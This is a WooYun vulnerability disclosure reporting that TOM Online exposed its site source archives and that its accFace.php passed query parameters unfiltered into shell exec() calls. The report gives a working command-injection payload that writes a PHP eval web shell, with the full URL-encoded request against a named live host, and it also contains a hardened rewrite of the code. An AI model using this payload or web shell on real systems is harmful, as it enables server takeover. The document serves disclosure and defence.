Vulnerability summary

Defect ID: wooyun-2013-046823

Title: An operations defect at TOM Online leads to arbitrary command execution

Vendor: TOM Online

Author: felixk3y

Submitted: 2013-12-23 17:49

Fixed: 2014-02-06 17:50

Published: 2014-02-06 17:50

Vulnerability type: command execution

Severity: high

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2013-12-23: Details sent to the vendor; awaiting vendor handling
2013-12-24: Vendor confirmed; details disclosed to the vendor only
2014-01-03: Details disclosed to core white hats and relevant domain experts
2014-01-13: Details disclosed to regular white hats
2014-01-23: Details disclosed to intern white hats
2014-02-06: Details disclosed to the public

Brief description:

Abusing an operations defect at TOM Online leads directly to command execution.

Detailed description:

@xsser The TOM arbitrary file upload I just posted, I know it was already submitted, but the vendor hasn't fixed it; please notify the vendor again, thanks.
I really don't know what to say about this vulnerability; the ops people and the developers really need some retraining...
#1 The source code of many sites can be downloaded by anyone

http://post.news.tom.com/post.tar.gz
http://post.tom.com/post.tar.gz
http://post.weiqi.tom.com/post.tar.gz
http://post.auto.tom.com/post.tar.gz
http://post.she.tom.com/post.tar.gz


This is probably not the full list; check carefully.
#2 Extract post.tar.gz


Proof of vulnerability:

#3 A quick audit of the downloaded code
The accFace.php file in the root directory

<?php
//...
// Both parameters come straight from the query string and are URL-decoded a second time
$faceName = urldecode(trim($_GET['faceName']));
$tmpPath = urldecode(trim($_GET['tmpPath']));
if (get_magic_quotes_gpc()) {
    $faceName = stripslashes($faceName);
    $tmpPath = stripslashes($tmpPath);
    $localPath = stripslashes($localPath);
}
// Strips the trailing file name; $subPath is built from the unfiltered $faceName
$subPath = $FACE_LOCAL_PATH.preg_replace('/\\/[^\\/]+?\\w$/i', '', $faceName);
if (!file_exists($subPath)) {
    @exec("mkdir -p $subPath");   // $subPath is interpolated into a shell command
}
// $faceName and $tmpPath are interpolated into a second shell command
$commandDesc = "wget -O $FACE_LOCAL_PATH$faceName $tmpPath$faceName";
exec($commandDesc);
// generate the thumbnail
resizeImage($FACE_LOCAL_PATH.$faceName, $FACE_LOCAL_PATH.str_replace('.', '_s.', $faceName), $RESIZE_WIDTH, $RESIZE_HEIGHT);
?>


Lines 65-67:

if (!file_exists($subPath)) {
    @exec("mkdir -p $subPath");   // You can tell a C programmer wrote this: exec! PHP actually has a function for this....
}


$subPath is not filtered, so arbitrary commands can be executed...
#4 Exploiting it
Visiting accFace.php directly reveals the absolute path, so let's write a shell...

[screenshot: 1.jpg]


We construct the faceName parameter as:

aa || echo '<?php eval($_POST[#]);?>It works' >/data/webroot/post/tom.php


URL-encoded:

aa%20%7C%7C%20echo%20'<%3Fphp%20eval(%24_POST%5Bcmd%5D)%3B%3F>It%20works'%20>%2Fdata%2Fwebroot%2Fpost%2Ftom.php


Submit via GET:

http://post.news.tom.com/accFace.php?faceName=aa%20%7C%7C%20echo%20'%3C%3Fphp%20eval(%24_POST%5Bcmd%5D)%3B%3F%3EIt%20works'%20%3E%2Fdata%2Fwebroot%2Fpost%2Ftom.php&tmpPath=1&localPath=1


The command executed and tom.php was created in the root directory.

[screenshot: 2.jpg]


#5 Shell show

[screenshot: 3.jpg]

Fix suggestion:

Delete or rename the backup files, and review the code properly. Haha, I found you such a serious vulnerability; is there a gift in it for me...
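A hardened rewrite of the accFace.php logic analysed in #3, added here as an example and not TOM's code or the author's: it validates faceName against a strict relative-path pattern, restricts tmpPath to an allow-listed host (the host name is a hypothetical value), and uses mkdir() and PHP's own HTTP stream wrapper so no shell is ever invoked. $FACE_LOCAL_PATH, $RESIZE_WIDTH, $RESIZE_HEIGHT and resizeImage() are assumed to be defined as in the original file.

```php
<?php
// Hardened replacement for the accFace.php logic shown above (added example, not TOM's code).
// Assumed from the page: $FACE_LOCAL_PATH, $RESIZE_WIDTH, $RESIZE_HEIGHT and resizeImage().
// Hypothetical: the allow-list of hosts that temporary uploads may be fetched from.
$ALLOWED_SOURCE_HOSTS = ['img-tmp.example.internal'];

// faceName must look like dir/sub/name.ext: no '..', no spaces, no shell metacharacters.
function validateFaceName(string $faceName): ?string {
    $re = '#^(?:[A-Za-z0-9_-]+/)*[A-Za-z0-9_-]+\.(?:jpe?g|png|gif)\z#';
    return preg_match($re, $faceName) === 1 ? $faceName : null;
}

// tmpPath must be an http(s) URL whose host is on the allow-list; returned with a trailing slash.
function validateSourceUrl(string $tmpPath, array $allowedHosts): ?string {
    $p = parse_url($tmpPath);
    if ($p === false || !isset($p['scheme'], $p['host'])) return null;
    if (!in_array(strtolower($p['scheme']), ['http', 'https'], true)) return null;
    if (!in_array(strtolower($p['host']), $allowedHosts, true)) return null;
    return rtrim($tmpPath, '/') . '/';
}

function fail(int $status, string $msg): void { http_response_code($status); exit($msg); }

// $_GET is already URL-decoded by PHP; the original's second urldecode() is dropped.
$faceName = validateFaceName(trim((string)($_GET['faceName'] ?? '')));
$source   = validateSourceUrl(trim((string)($_GET['tmpPath'] ?? '')), $ALLOWED_SOURCE_HOSTS);
if ($faceName === null || $source === null) fail(400, 'invalid parameters');

$target = $FACE_LOCAL_PATH . $faceName;
$subDir = dirname($target);
// mkdir() does what exec("mkdir -p $subPath") did, with no shell in the loop.
if (!is_dir($subDir) && !mkdir($subDir, 0750, true)) fail(500, 'cannot create directory');

// Fetch with PHP's HTTP stream wrapper instead of shelling out to wget (needs allow_url_fopen).
$ctx  = stream_context_create(['http' => ['timeout' => 10, 'follow_location' => 0]]);
$data = @file_get_contents($source . $faceName, false, $ctx);
if ($data === false || @file_put_contents($target, $data) === false) fail(502, 'fetch failed');

// Confirm the download really is an image before handing it to the resizer.
if (@getimagesize($target) === false) { @unlink($target); fail(400, 'not an image'); }
resizeImage($target, $FACE_LOCAL_PATH . str_replace('.', '_s.', $faceName), $RESIZE_WIDTH, $RESIZE_HEIGHT);
```

The original's stripslashes() block for magic_quotes is dropped because the validated inputs can no longer contain quotes or backslashes.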

Copyright notice: when reposting, please credit the source felixk3y@WooYun


Vulnerability response

Vendor response:

Severity: high

Vulnerability Rank: 13

Confirmed: 2013-12-24 10:58

Vendor reply:

Thank you very much for helping TOM Online; we will handle this as soon as possible. We have created a technical exchange QQ group for researchers who support TOM Online: 328442670, and we hope you and more members will join so everyone can exchange ideas. In addition, after obtaining company approval, TOM Online will from time to time send gifts to researchers in appreciation of your support for TOM Online.

Latest status:

None yet